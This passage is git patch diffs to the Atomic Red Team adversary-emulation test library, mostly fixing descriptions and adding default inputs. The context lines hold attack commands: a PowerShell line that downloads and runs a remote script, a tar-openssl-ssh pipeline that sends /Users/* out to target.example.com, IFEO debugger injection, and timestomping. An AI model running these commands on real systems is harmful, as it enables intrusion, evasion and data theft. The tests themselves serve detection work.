directory on MacOS ' supported_platforms: - macos + input_arguments: + filename: + description: path of file to hide + type: path + default: "/tmp/evil" executor: name: sh command: 'chflags hidden #{filename} ' - name: Show all hidden files - description: 'xxx + description: 'Show all hidden files on MacOS ' supported_platforms: @@ -5048,8 +5063,8 @@ defense-evasion: command: 'defaults write com.apple.finder AppleShowAllFiles YES ' - - name: Create visible Directories - description: 'xxx + - name: Create Visible Directories + description: 'Create visible directories on MacOS and Linux ' supported_platforms: @@ -5063,7 +5078,7 @@ defense-evasion: ls ls visible-directory - name: Create hidden directories and files - description: 'xxx + description: 'Create hidden directories and files on Nix platforms ' supported_platforms: @@ -5250,7 +5265,7 @@ defense-evasion: identifier: T1183 atomic_tests: - name: IFEO Add Debugger - description: 'TODO + description: 'Leverage Global Flags Settings ' supported_platforms: @@ -5270,7 +5285,7 @@ defense-evasion: File Execution Options\#{target_binary}" /v Debugger /d "#{payload_binary}" ' - - name: IFEO GLobal Flags + - name: IFEO Global Flags description: 'Leverage Global Flags Settings ' @@ -6491,7 +6506,7 @@ defense-evasion: identifier: T1150 atomic_tests: - name: Plist Modification - description: 'TODO + description: 'Modify MacOS plist file in one of two directories ' supported_platforms: @@ -7040,17 +7055,6 @@ defense-evasion: name: sh command: 'sudo modprobe #{rootkit_file} -' - - name: LD_PRELOAD based Rootkit - description: 'LD_PRELOAD based Rootkit - -' - supported_platforms: - - linux - executor: - name: sh - command: 'export LD_PRELOAD=$PWD/#{rootkit_file} - ' - name: Windows Signed Driver Rootkit Test description: | @@ -8612,7 +8616,7 @@ privilege-escalation: identifier: T1183 atomic_tests: - name: IFEO Add Debugger - description: 'TODO + description: 'Leverage Global Flags Settings ' supported_platforms: @@ -8632,7 +8636,7 @@ privilege-escalation: File Execution Options\#{target_binary}" /v Debugger /d "#{payload_binary}" ' - - name: IFEO GLobal Flags + - name: IFEO Global Flags description: 'Leverage Global Flags Settings ' @@ -8725,7 +8729,7 @@ privilege-escalation: identifier: T1160 atomic_tests: - name: Launch Daemon - description: 'TODO + description: 'Utilize LaunchDaemon to launch `Hello World` ' supported_platforms: @@ -8926,7 +8930,7 @@ privilege-escalation: identifier: T1150 atomic_tests: - name: Plist Modification - description: 'TODO + description: 'Modify MacOS plist file in one of two directories ' supported_platforms: @@ -13321,7 +13325,7 @@ execution: identifier: T1168 atomic_tests: - name: Cron Job - description: 'TODO + description: 'Set a cron job ' supported_platforms: @@ -13340,7 +13344,7 @@ execution: ' - name: Cron Job - description: 'TODO + description: 'Manually set a cron job ' supported_platforms: @@ -15610,8 +15614,8 @@ lateral-movement: type: attack-pattern identifier: T1105 atomic_tests: - - name: xxxx - description: 'xxxx + - name: rsync - scp - sftp remote file copy + description: 'Utilize rsync, scp and sftp to perform a remote file copy ' supported_platforms: @@ -15620,7 +15624,7 @@ lateral-movement: executor: name: bash command: | - ### TODO: Not sure how to handle commands that need to be run on multiple systems + ### FIX: Not sure how to handle commands that need to be run on multiple systems # Adversary System Configuration # Ensure SSH access has been configured for an adversary account @@ -16212,7 +16216,7 @@ collection: - windows executor: name: powershell - command: '"IEX (New-Object Net.WebClient).DownloadString(''https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074/Discovery.bat'')" + command: '"IEX (New-Object Net.WebClient).DownloadString(''https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat'')" > c:\windows\pi.log ' @@ -16547,9 +16551,8 @@ exfiltration: identifier: T1002 atomic_tests: - name: Compress Data for Exfiltration With PowerShell - description: 'TODO - -' + description: "An adversary may compress data (e.g., sensitive documents) that + is collected prior to exfiltration \n" supported_platforms: - windows input_arguments: @@ -16567,9 +16570,8 @@ exfiltration: ' - name: Compress Data for Exfiltration With Rar - description: 'TODO - -' + description: "An adversary may compress data (e.g., sensitive documents) that + is collected prior to exfiltration \n" supported_platforms: - windows input_arguments: @@ -16587,9 +16589,8 @@ exfiltration: ' - name: Data Compressed - nix - description: 'TODO - -' + description: "An adversary may compress data (e.g., sensitive documents) that + is collected prior to exfiltration \n" supported_platforms: - linux - macos @@ -16667,7 +16668,7 @@ exfiltration: identifier: T1022 atomic_tests: - name: Data Encrypted - description: 'TODO + description: 'Encrypt data for exiltration ' supported_platforms: @@ -16738,11 +16739,6 @@ exfiltration: - centos - ubuntu - linux - input_arguments: - output_file: - description: TODO - type: todo - default: TODO executor: name: sh command: | @@ -16833,6 +16829,19 @@ exfiltration: - centos - ubuntu - linux + input_arguments: + domain: + description: target SSH domain + type: url + default: target.example.com + user_name: + description: username for domain + type: string + default: atomic + password: + description: password for user + type: string + default: atomic executor: name: sh command: 'tar czpf - /Users/* | openssl des3 -salt -pass #{password} | ssh @@ -17066,8 +17075,8 @@ command-and-control: type: attack-pattern identifier: T1105 atomic_tests: - - name: xxxx - description: 'xxxx + - name: rsync - scp - sftp remote file copy + description: 'Utilize rsync, scp and sftp to perform a remote file copy ' supported_platforms: @@ -17076,7 +17085,7 @@ command-and-control: executor: name: bash command: | - ### TODO: Not sure how to handle commands that need to be run on multiple systems + ### FIX: Not sure how to handle commands that need to be run on multiple systems # Adversary System Configuration # Ensure SSH access has been configured for an adversary account diff --git a/atomics/linux-index.md b/atomics/linux-index.md index e7af431d..e9f45e4d 100644 --- a/atomics/linux-index.md +++ b/atomics/linux-index.md @@ -12,7 +12,7 @@ - [T1158 Hidden Files and Directories](./T1158/T1158.md) - Atomic Test #1: Create a hidden file in a hidden directory [linux, macos] - Atomic Test #3: Hidden file [macos, linux] - - Atomic Test #7: Create visible Directories [macos, linux] + - Atomic Test #7: Create Visible Directories [macos, linux] - Atomic Test #8: Create hidden directories and files [macos, linux] - T1215 Kernel Modules and Extensions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1168 Local Job Scheduling](./T1168/T1168.md) @@ -67,7 +67,7 @@ - T1017 Application Deployment Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1210 Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1105 Remote File Copy](./T1105/T1105.md) - - Atomic Test #1: xxxx [linux, macos] + - Atomic Test #1: rsync - scp - sftp remote file copy [linux, macos] - T1021 Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1184 SSH Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1072 Third-party Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) @@ -146,7 +146,7 @@ - [T1158 Hidden Files and Directories](./T1158/T1158.md) - Atomic Test #1: Create a hidden file in a hidden directory [linux, macos] - Atomic Test #3: Hidden file [macos, linux] - - Atomic Test #7: Create visible Directories [macos, linux] + - Atomic Test #7: Create Visible Directories [macos, linux] - Atomic Test #8: Create hidden directories and files [macos, linux] - T1066 Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1070 Indicator Removal on Host](./T1070/T1070.md) @@ -163,7 +163,6 @@ - [T1014 Rootkit](./T1014/T1014.md) - Atomic Test #1: Loadable Kernel Module based Rootkit [linux] - Atomic Test #2: Loadable Kernel Module based Rootkit [linux] - - Atomic Test #3: LD_PRELOAD based Rootkit [linux] - [T1064 Scripting](./T1064/T1064.md) - Atomic Test #1: Create and Execute Bash Shell Script [macos, linux] - [T1151 Space after Filename](./T1151/T1151.md) @@ -211,7 +210,7 @@ - T1205 Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1219 Remote Access Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1105 Remote File Copy](./T1105/T1105.md) - - Atomic Test #1: xxxx [linux, macos] + - Atomic Test #1: rsync - scp - sftp remote file copy [linux, macos] - T1071 Standard Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1032 Standard Cryptographic Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1095 Standard Non-Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) diff --git a/atomics/macos-index.md b/atomics/macos-index.md index a5c212f9..2552ce47 100644 --- a/atomics/macos-index.md +++ b/atomics/macos-index.md @@ -16,7 +16,7 @@ - Atomic Test #4: Hidden files [macos] - Atomic Test #5: Hide a Directory [macos] - Atomic Test #6: Show all hidden files [macos] - - Atomic Test #7: Create visible Directories [macos, linux] + - Atomic Test #7: Create Visible Directories [macos, linux] - Atomic Test #8: Create hidden directories and files [macos, linux] - T1215 Kernel Modules and Extensions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1161 LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) @@ -120,7 +120,7 @@ - [T1037 Logon Scripts](./T1037/T1037.md) - Atomic Test #2: Logon Scripts - Mac [macos] - [T1105 Remote File Copy](./T1105/T1105.md) - - Atomic Test #1: xxxx [linux, macos] + - Atomic Test #1: rsync - scp - sftp remote file copy [linux, macos] - T1021 Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1184 SSH Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1072 Third-party Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) @@ -206,7 +206,7 @@ - Atomic Test #4: Hidden files [macos] - Atomic Test #5: Hide a Directory [macos] - Atomic Test #6: Show all hidden files [macos] - - Atomic Test #7: Create visible Directories [macos, linux] + - Atomic Test #7: Create Visible Directories [macos, linux] - Atomic Test #8: Create hidden directories and files [macos, linux] - [T1147 Hidden Users](./T1147/T1147.md) - Atomic Test #1: Hidden Users [macos] @@ -252,7 +252,7 @@ - T1205 Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1219 Remote Access Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1105 Remote File Copy](./T1105/T1105.md) - - Atomic Test #1: xxxx [linux, macos] + - Atomic Test #1: rsync - scp - sftp remote file copy [linux, macos] - T1071 Standard Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1032 Standard Cryptographic Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1095 Standard Non-Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) diff --git a/atomics/windows-index.md b/atomics/windows-index.md index a767df04..905fd045 100644 --- a/atomics/windows-index.md +++ b/atomics/windows-index.md @@ -43,7 +43,7 @@ - Atomic Test #10: Create ADS PowerShell [windows] - [T1183 Image File Execution Options Injection](./T1183/T1183.md) - Atomic Test #1: IFEO Add Debugger [windows] - - Atomic Test #2: IFEO GLobal Flags [windows] + - Atomic Test #2: IFEO Global Flags [windows] - T1054 Indicator Blocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1066 Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1070 Indicator Removal on Host](./T1070/T1070.md) @@ -84,7 +84,7 @@ - Atomic Test #2: Regsvr32 remote COM scriptlet execution [windows] - Atomic Test #3: Regsvr32 local DLL execution [windows] - [T1014 Rootkit](./T1014/T1014.md) - - Atomic Test #4: Windows Signed Driver Rootkit Test [windows] + - Atomic Test #3: Windows Signed Driver Rootkit Test [windows] - [T1085 Rundll32](./T1085/T1085.md) - Atomic Test #1: Rundll32 execute JavaScript Remote Payload With GetObject [windows] - T1198 SIP and Trust Provider Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) @@ -127,7 +127,7 @@ - Atomic Test #1: Hook PowerShell TLS Encrypt/Decrypt Messages [windows] - [T1183 Image File Execution Options Injection](./T1183/T1183.md) - Atomic Test #1: IFEO Add Debugger [windows] - - Atomic Test #2: IFEO GLobal Flags [windows] + - Atomic Test #2: IFEO Global Flags [windows] - [T1050 New Service](./T1050/T1050.md) - Atomic Test #1: Service Installation [windows] - Atomic Test #2: Service Installation PowerShell Installs A Local Service using PowerShell [windows] @@ -188,7 +188,7 @@ - Atomic Test #1: Installing Hyper-V Feature [windows] - [T1183 Image File Execution Options Injection](./T1183/T1183.md) - Atomic Test #1: IFEO Add Debugger [windows] - - Atomic Test #2: IFEO GLobal Flags [windows] + - Atomic Test #2: IFEO Global Flags [windows] - T1177 LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1037 Logon Scripts](./T1037/T1037.md) - Atomic Test #1: Logon Scripts [windows] From 22d5574c10d6d89cb3b553bc6e7bb89ad833f109 Mon Sep 17 00:00:00 2001 From: Michael Haag Date: Fri, 2 Nov 2018 15:10:44 -0600 Subject: [PATCH 5/5] Fixed T1099 (#399) * Fixed T1099 fixed T1099 input args * Generate docs from job=validate_atomics_generate_docs branch=T1099-2 --- atomics/T1099/T1099.md | 6 +++--- atomics/T1099/T1099.yaml | 3 +++ atomics/index.yaml | 3 +++ 3 files changed, 9 insertions(+), 3 deletions(-) diff --git a/atomics/T1099/T1099.md b/atomics/T1099/T1099.md index e314000d..d05ffa3a 100644 --- a/atomics/T1099/T1099.md +++ b/atomics/T1099/T1099.md @@ -32,7 +32,7 @@ Stomps on the access timestamp of a file #### Inputs | Name | Description | Type | Default Value | |------|-------------|------|---------------| -| target_filename | Path of file that we are going to stomp on last access time | Path | | +| target_filename | Path of file that we are going to stomp on last access time | Path | /opt/filename| #### Run it with `sh`! ``` @@ -50,7 +50,7 @@ Stomps on the modification timestamp of a file #### Inputs | Name | Description | Type | Default Value | |------|-------------|------|---------------| -| target_filename | Path of file that we are going to stomp on last access time | Path | | +| target_filename | Path of file that we are going to stomp on last access time | Path | /opt/filename| #### Run it with `sh`! ``` @@ -71,7 +71,7 @@ Sudo or root privileges are required to change date. Use with caution. #### Inputs | Name | Description | Type | Default Value | |------|-------------|------|---------------| -| target_filename | Path of file that we are going to stomp on last access time | Path | | +| target_filename | Path of file that we are going to stomp on last access time | Path | /opt/filename| #### Run it with `sh`! ``` diff --git a/atomics/T1099/T1099.yaml b/atomics/T1099/T1099.yaml index b2905803..9ecc5331 100644 --- a/atomics/T1099/T1099.yaml +++ b/atomics/T1099/T1099.yaml @@ -13,6 +13,7 @@ atomic_tests: target_filename: description: Path of file that we are going to stomp on last access time type: Path + default: /opt/filename executor: name: sh command: | @@ -28,6 +29,7 @@ atomic_tests: target_filename: description: Path of file that we are going to stomp on last access time type: Path + default: /opt/filename executor: name: sh command: | @@ -47,6 +49,7 @@ atomic_tests: target_filename: description: Path of file that we are going to stomp on last access time type: Path + default: /opt/filename executor: name: sh command: | diff --git a/atomics/index.yaml b/atomics/index.yaml index 05d74bf6..cfd8b96f 100644 --- a/atomics/index.yaml +++ b/atomics/index.yaml @@ -7450,6 +7450,7 @@ defense-evasion: target_filename: description: Path of file that we are going to stomp on last access time type: Path + default: "/opt/filename" executor: name: sh command: 'touch -a -t 197001010000.00 #{target_filename} @@ -7466,6 +7467,7 @@ defense-evasion: target_filename: description: Path of file that we are going to stomp on last access time type: Path + default: "/opt/filename" executor: name: sh command: 'touch -m -t 197001010000.00 #{target_filename} @@ -7484,6 +7486,7 @@ defense-evasion: target_filename: description: Path of file that we are going to stomp on last access time type: Path + default: "/opt/filename" executor: name: sh command: |